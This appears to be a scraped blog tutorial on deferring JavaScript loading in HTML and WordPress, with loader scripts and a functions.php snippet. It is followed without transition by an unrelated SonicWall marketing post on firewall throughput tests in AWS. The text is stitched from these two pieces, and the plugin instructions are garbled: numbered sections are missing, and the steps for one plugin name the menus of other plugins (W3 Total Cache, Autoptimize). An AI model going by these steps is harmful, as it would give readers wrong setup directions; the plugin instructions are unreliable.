Now, since you have an understanding of what is defer parsing of JavaScript and why you should defer loading of JavaScript(s).
It is a good time to figure outwhich JavaScript(s) (on your website) are the culprits and need to be deferred.
If you already know which JavaScript(s) on your website are blocking the critical rendering path, you may skip the following section and jump to the implementation part. Otherwise, keep on reading…
How to Find Render-blocking JavaScript(s)
JavaScript(s) which block the rendering of meaningful content are called ‘Render Blocking JavaScript(s)’ and need to be deferred.
You can find render-blocking JavaScript(s) by analyzing your website using site speed testing tools.
There are several pagespeed testing tools available to analyze a website for site speed and loading time. I am sharing with you the most reliable and trusted tools for pagespeed testing.
Test your site using these tools and note the results of these tools so that you can compare the results before and after implementing defer parsing of JavaScript(s).
1. PageSpeed Insights by Google
Google PageSpeed Insights (PSI) is an exclusive pagespeed testing tool by Google. Test your website using Google PSI Tool to find out render-blocking JavaScript(s). PageSpeed Insights Tool results give information about warnings and their solutions/fixes.
2. GTmetrix
This one (GTmetrix) is another good free tool to test site speed. You can test your site with GTmetrix to know which JavaScripts need to be deferred.
3. Pingdom Tools
Solarwinds’ Pingdom Tools are also very popular when it comes to site speed testing tools. You can test your site using Pingdom Tools to check the number of JS requests on your site and how much they contribute to the total number of requests.
Now you know which JavaScript(s) are making your site slow and need to be deferred. So, let’s see how to fix this issue by deferring non-critical JavaScript(JS).
Test Results: Before Defer Parsing of JavaScript
I have tested a website beforeimplementing defer parsing of JavaScript. Consider these a baseline and compare these results after deferred loading of JavaScripts.
How to Defer Parsing of JavaScript [Step by step]
You need to use the following code to defer parsing JavaScript. Insert this code in HTML file just before the </body> tag. Read the instructions given below to use this script.
< script type="text/javascript">
function parseJSAtOnload() {
var element = document.createElement("script");
element.src = "script_to_be_deferred.js";
document.body.appendChild(element);
}
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script >
Instructions for Defer Parsing JavaScript using the script
Don’t forget to take a complete backup before making any changes in the code. If something went wrong, you can use that backup to go back.
Copy the code and paste it in HTML file just before the </body> tag (near the bottom of HTML file).
Replace script_to_be_deferred.js with the link of the JavaScript which is to be deferred. You can copy the link of JavaScript(s) (which Google PageSpeed tool suggests to defer) from Google PageSpeed Insights tool results for your website.
Save changes. And you are done.
Finally, test your website again to see the effect.
Code to Defer Multiple JavaScripts in One-go
If you want to defer multiple scripts in one go. You can use the same script with little modification. In the following code replace defer1.js, defer3.js, and defer3.js, etc. with the link of scripts that you want to defer.
< script type="text/javascript">
function parseJSAtOnload() {
var links = ["defer1.js", "defer2.js", "defer3.js"],
headElement = document.getElementsByTagName("head")[0],
linkElement, i;
for (i = 0; i < links.length; i++) {
linkElement = document.createElement("script");
linkElement.src = links[i];
headElement.appendChild(linkElement);
}
}
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script >
How to Defer Parsing of JavaScript in WordPress
You can defer parsing of JavaScript in WordPress by following methods:
Using WordPress Plugins (with a plugin) – suitable for all plugin lovers.
Adding a Code Snippet to function.php file – suitable for those who are used to playing with code and editing files in WordPress. – without plugin method #1
Using the Script mentioned above – suitable for geeks who don’t want to use a plugin. – without plugin method #2
1. Defer Parsing of JavaScript using WordPress Plugin
There are several WordPress plugins available to defer parsing of JavaScript in WordPress, I am listing the best plugins that stand out in the crowd because of their performance and reliability.
Obviously, the process of installing and activating any of the following plugins remains the same.
If you’re not sure about the process of installing a WordPress plugin, you can refer this beginner’s guide to learn different methods of installing a plugin in WordPress.
#1.1 Async JavaScript Plugin
If you want a standalone plugin to defer parsing of JavaScript, Async JavaScript should be your pick.
This tiny plugin offers all necessary settings to tweak deferred loading of JS in WordPress.
HOW TO USE ASYNC JAVASCRIPT PLUGIN: SETTINGS & USAGE GUIDE
Steps to defer parsing of javascript in WordPress using a plugin:
Navigate to WordPress Dashboard > Plugins > Add New.
Search Async JavaScript Plugin in the plugin repository.
Go over WP Dashboard > Performance (W3 Total Cache Settings) > Minify.
Scroll down to JS minify settings. You will see settings like shown in the image below.
Check/select options as shown in the image below. Click Save all settings and you are done.
Test your site using pagespeed test to see the results.
#1.4 Defer Loading of JavaScript in LiteSpeed Cache Plugin
LiteSpeed Cache is an amazing optimization plugin for LiteSpeed server hosting. But the general features of this plugin can be utilized on any server like LiteSpeed, Apache, NGINX, etc.
Steps to defer parsing of javascript in LiteSpeed Cache plugin:
Go to Dashboard > Settings > Autoptimize > JS, CSS & HTML.
Under JavaScript Options enable Optimize JavaScript Code and,
Then enable Do not aggregate but defer option and save changes.
Now Empty Cache and test your site using speed test tool to see the result.
#1.8 WP Fastest Cache to Defer Parsing of JavaScript
You can eliminate render-blocking JavaScript resources using WP Fastest Cache plugin. But this feature is available with the premium version only.
2. Defer JavaScript Parsing in WordPress via functions.php file
Yes, you can defer parsing of JavaScript in WordPress by adding a code snippet to function.php file.
This is one of the methods that you can use to Defer Parsing of JavaScript in WordPress without using a plugin.
As I have mentioned above this method is suitable for people who are comfortable with code editing in WordPress.
You might be thinking, but why?
First of all, functions.php is an important theme file. That means you might end up breaking your site easily if anything went wrong with the editing of functions.php file.
Also, there are different versions of the code snippet on the web to fix defer parsing of JavaScript in WordPress via functions file. Unfortunately, not all the code snippets work fine.
So you should be careful while using a code snippet to defer loading of JavaScript.
How to Edit functions.php File Safely
I always recommend using a child theme in WordPress in order to avoid code editing mess.
Because while editing the code, even if you miss a single comma (,) semicolon (;) or any other symbol/syntax, your website will break completely or partially. And you have to make extra efforts to recover the site.
For any reason, if you don’t want to implement a child theme now, you can use this plugin to add code to functions.php file of your theme without editing the original file.
Step by step process to Defer Parsing JavaScript in WordPress via functions.php
Take a complete backup before making any changes to the code.
I assume that you’re using a child theme. If you’re not, first create and activate a child theme to any trouble because of theme file editing.
Go to your WordPress Dashboard > Appearance > Theme Editor
Select/open functions.php file (of child theme) from theme files.
Paste the code snippet given below at the end of functions.php file.
You can specify JS files to exclude from defer in the array (‘jquery.js’).
Finally, click Update File to save changes. That’s all.
The code snippet is to be pasted in functions.php file.
// Defer Parsing of JavaScript in WordPress via functions.php file
// Learn more at https://technumero.com/defer-parsing-of-javascript/
function defer_parsing_js($url) {
//Add the files to exclude from defer. Add jquery.js by default
$exclude_files = array('jquery.js');
//Bypass JS defer for logged in users
if (!is_user_logged_in()) {
if (false === strpos($url, '.js')) {
return $url;
}
foreach ($exclude_files as $file) {
if (strpos($url, $file)) {
return $url;
}
}
} else {
return $url;
}
return "$url' defer='defer";
}
add_filter('clean_url', 'defer_parsing_js', 11, 1);
The above code snippet is using defer attribute to defer parsing of JavaScripts. You can replace the defer attribute with async attribute to parse JavaScript asynchronously. You can read more about async attribute and other methods to fix render-blocking JavaScript.
3. Defer Parsing of JavaScript without WordPress Plugin – Script Method
The script method explained above can be used in WordPress to defer loading of javascript. In WordPress, the above-mentioned code can be placed in HTML file just before the </body> tag using hook content option.
Most of the popular WordPress themes come with hook content provision. If you are not using the hook content option or it is not available in your theme. Then, either you can use a WordPress plugin to add the script to WordPress footer before </body> tag or you can place the script in the footer file just before the </body> tag manually.
Steps to defer load javascript in WordPress without using a plugin:
Copy the code and paste that before the </body> tag (using a plugin or built-in theme hook) .
Now replace script_to_be_deferred.js with the JavaScript to be deferred.
Save changes and you’re done.
Clear the cache, if there is any.
Test your website again to see the result.
Test Results: After Defer Parsing of JavaScript
The following are the test results after defer loading of JavaScript.
Wrapping it up
Other than defer parsing of JavaScript, you can also use async attribute or inline JavaScript to remove render-blocking JavaScript. I have covered async attribute or inline JavaScript in another blog post, read that article here. In that article, I have also mentioned a few useful WordPress plugins to defer parsing JavaScript.
Although WordPress plugins are available to defer parsing of JavaScript. The above-explained script method is considered more appropriate by several experts and webmasters. But the people who use WordPress know that using a WordPress plugin is like bliss.
I hope this guide will help you to defer parsing of JavaScript. Let me know, which technique you use to defer parsing of JavaScript. If you are facing any problem implementing the above methods or have a question. Let me know via the comment section. I will be happy to answer.
Looking for the best way to extend your firewall protection to the cloud? Independent testing recently found that SonicWall NSv series is more than up to the challenge.
More than 90% of enterprises use the cloud in some way, with 69% of those considered hybrid cloud users (utilizing both private and public clouds). Along with widespread remote work adoption, this shift is driving the need for scaled-out, distributed infrastructure.
Within this new cloud landscape, security has become more complex as the number of perimeters and integrations grow, and cybercriminals increasingly focus on security gaps and vulnerabilities in cloud implementations. It’s often easier for threat actors to exploit these vulnerabilities than it is to breach hardened components of the cloud deployment.
A next-generation firewall deployed in the cloud can protect critical data stored in the cloud. But it’s important to make sure this firewall provides the same level of security and performance as an on-premises firewall.
Recently, Tolly Group used Keysight Technologies’ brand-new native cloud testing solution — CyPerf — to measure the performance of SonicWall NSv 470 virtual firewall in Amazon Web Services (AWS). AWS is the major public cloud vendor, with a projected 49% market share in enterprise cloud adoption for 2022. AWS recommends a shared responsibility model, meaning AWS is responsible for the security of the cloud, and the customer is responsible for security in the cloud.
What is SonicWall NSv virtual firewall?
SonicWall’s NSv Series virtual firewalls provide all the security advantages of a physical firewall, plus all the operational and economic benefits of the cloud — including system scalability and agility, speed of system provisioning, simple management and cost reduction. NSv delivers full-featured security tools including VPN, IPS, application control and URL filtering. These capabilities shield all critical components of the private/public cloud environments from resource misuse attacks, cross-virtual-machine attacks, side-channel attacks, and common network-based exploits and threats.
What is Keysight Technologies CyPerf?
Keysight CyPerf is the industry’s first cloud-native software solution that recreates every aspect of a realistic workload across a variety of physical and cloud environments. CyPerf deployed across a variety of heterogeneous cloud environments realistically models dynamic application traffic, user behavior and threat vectors at scale. It validates hybrid cloud networks, security devices and services for more confident rollouts.
Putting SonicWall NSv to the Test
Keysight Technologies and Tolly Group engineers tested a SonicWall NSv 470 virtual firewall running SonicOSX version 7. The AWS instance for the NSv 470 under test was AWS C5.2xlarge. The engineers deployed CyPerf agents on AWS C5.n2xlarge instances to be certain that the agents would have sufficient resources to stress the firewall under test. Each of two agent instances was provisioned with 8 vCPUs, 21GB memory and 25GbE network interfaces.
Test methodology and results
The engineers used three different traffic profiles to collect results — unencrypted HTTP traffic, encrypted (HTTPS/TLS) traffic, and Tolly’s productivity traffic mix, which includes five applications: JIRA, Office 365, Skype, AWS S3 and Salesforce. Engineers used CyPerf application mix tests to create the Tolly productivity mix and generate stateful, simulated application traffic.
The tests were run against three different security profiles:
1) Firewall: Basic firewall functions with no policy set
2) IPS: Firewall with the intrusion prevention system feature enabled
3) Threat Prevention: Firewall with IPS, antivirus, anti-spyware and application control features enabled
The results observed in the AWS public cloud environment are similar to the results observed in virtual environment.
Test
Unencrypted HTTP Traffic
Encrypted HTTPS/TLS Traffic
Firewall Throughput
7.70 Gbps
3.10 Gbps
IPS Throughput
7.60 Gbps
3.05 Gbps
Threat Prevention
7.40 Gbps
3.04 Gbps
Table 1: Test measurements for NSv 470 in AWS Cloud
Note: The table above highlights just a few of the test results. For complete results and test parameters, please download the report.
Conclusion
Most enterprises are moving their datacenters away from traditional on-premises deployments and to the cloud. It is imperative that security teams provide the same level of security for cloud server instances as they have been doing for on-premises physical servers. A next-generation firewall with advanced security services like IPS and application control is the first step to securing cloud instances against cyber threats.
In addition to security features, it also important to choose a firewall that provides the right level of performance needed for a given cloud workload. SonicWall NSv series offers a variety of models with performance levels suited to any size of cloud deployment, with all the necessary security features enabled. To learn more about how SonicWall NSv Series excels in AWS environments, click here.